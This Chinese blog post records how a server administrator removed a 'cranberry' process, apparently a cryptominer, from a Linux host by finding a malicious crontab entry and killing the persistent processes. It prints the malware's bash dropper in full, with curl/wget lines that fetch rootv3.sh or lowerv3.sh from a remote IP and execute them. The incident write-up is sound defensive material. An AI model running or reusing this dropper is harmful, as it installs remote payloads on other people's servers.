为了账号安全,请及时绑定邮箱和手机立即绑定
首页 手记 记录徒手解决cranberry病毒的过程

记录徒手解决cranberry病毒的过程

标签:
Linux


起始

今天中午测试反馈说线上系统频繁的报502错误,并且响应极慢。

开始怀疑是公司哪位小哥在下载小电影,但打开其他网站都很快。于是继续怀疑难道是业务激增导致带宽被占满了,于是登录监控界面,显示只用了80Mb,带宽也没占满。

发现根本原因

ssh上服务器之后,本能的执行top命令,返现cranberry进程几乎把cpu吃满了。 

记录徒手解决cranberry病毒的过程

于是尝试kill掉进程

kill -9 14465

kill掉之后,cranberry又会立即自动重启。

在紧盯屏幕之后,惊喜的发现crontab进程。于是大喜过望,这哥们会啊。crontab命令教程

于是查看crontab的列表

crontab -l

看到如下命令,会通过定时任务去远程服务器下载脚本。 

记录徒手解决cranberry病毒的过程

于是把crontab的列表删掉

crontab -r

然后,以为kill掉cranberry之后,就ok了,谁知道还是自动重启。

那只能耐着性子,把脚本下载下来研究一下了,脚本内容如下:

#!/bin/bash

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

pkill -f jIuc2ggfCAvYmluL2Jhc2gi

pkill -f lowerv2.sh

pkill -f rootv2.sh

pkill -f sourplum

pkill -f nativesvc

ps aux | awk '{if($3>20.0) print $2}' | while read procid

do

kill -9 $procid

done

whoami=$( whoami )

if [ ${whoami}x != "root"x ];then

    curl http://172.96.252.86/lowerv3.sh > /tmp/lower.sh

    if [ ! -f "/tmp/lower.sh" ] ;then

        wget -P /tmp/ http://172.96.252.86/lowerv3.sh

        rm /tmp/lower.sh.*

    fi

    chmod 777 /tmp/lower.sh

    bash /tmp/lower.sh

else

    curl http://172.96.252.86/rootv3.sh > /etc/root.sh

    if [ ! -f "/etc/root.sh" ] ;then

        wget -O /etc/root.sh http://172.96.252.86/rootv3.sh

    fi

    chmod 777 /etc/root.sh

    bash /etc/root.sh

fi

echo "over"

这脚本倒也简单,主要是下载另外一个脚本,到/etc/目录中,名字是root.sh.

于是查看是哪个进程执行了脚本:

root@SSP001:[/proc]ps -ef|grep root.sh

root      1541 28244  0 16:19 pts/1    00:00:00 grep root.sh

root      2036  1653  0 11:00 ?        00:00:57 bash /etc/root.sh

root      2080  1544  0 06:00 ?        00:01:21 bash /etc/root.sh

root      6035  5979  0 Jan15 ?        00:13:01 bash /etc/root.sh

root      8659  8156  0 05:00 ?        00:01:24 bash /etc/root.sh

root      9649  9627  0 Jan15 ?        00:07:03 bash /etc/root.sh

root      9979  9731  0 02:00 ?        00:03:12 bash /etc/root.sh

root     11925 11497  0 14:00 ?        00:00:16 bash /etc/root.sh

root     14874 14437  0 Jan15 ?        00:08:55 bash /etc/root.sh

root     14931 14794  0 Jan15 ?        00:12:22 bash /etc/root.sh

root     14935 13330  0 15:00 ?        00:00:00 bash /etc/root.sh

root     15050 14391  0 12:00 ?        00:00:32 bash /etc/root.sh

root     15596 15349  0 Jan15 ?        00:03:46 bash /etc/root.sh

把上边的进程kill掉:

kill -9 2036 2080 6035 8659 9649 9979 11925 14874 14931 14935 15050 15596 16459 17199 19983 20478 20795 21609 21810 23402 24943 25513 27988 28883 29853 31304 31499 32364

然后再kill掉cranberry:

killall -9 cranberry

于是cpu恢复到了正常水平。

cranberry病毒的原理

通过定时去远程下载脚本

通过脚本,执行守护任务,

发现cranberry被kill之后,立即通过crontab启动。

©著作权归作者所有:来自51CTO博客作者feelgood3000的原创作品,谢绝转载,否则将追究法律责任

cranberry病毒crontab linux


点击查看更多内容
发表于 2019.03.02 15:30, 共 1030 人浏览

本文原创发布于慕课网 ,转载请注明出处,谢谢合作

举报
TA 点赞

若觉得本文不错,就分享一下吧!

评论

作者其他优质文章

正在加载中

PIPIONE

手记
粉丝
147
获赞与收藏
702

关注作者,订阅最新文章

阅读免费教程

  • 推荐
  • 评论
  • 收藏
  • 共同学习,写下你的评论
感谢您的支持,我会继续努力的~
扫码打赏,你说多少就多少
赞赏金额会直接到老师账户
支付方式
打开微信扫一扫,即可进行扫码打赏哦
今天注册有机会得

100积分直接送

付费专栏免费学

大额优惠券免费领

立即参与 放弃机会
意见反馈 帮助中心 APP下载
官方微信

举报

0/150
提交
取消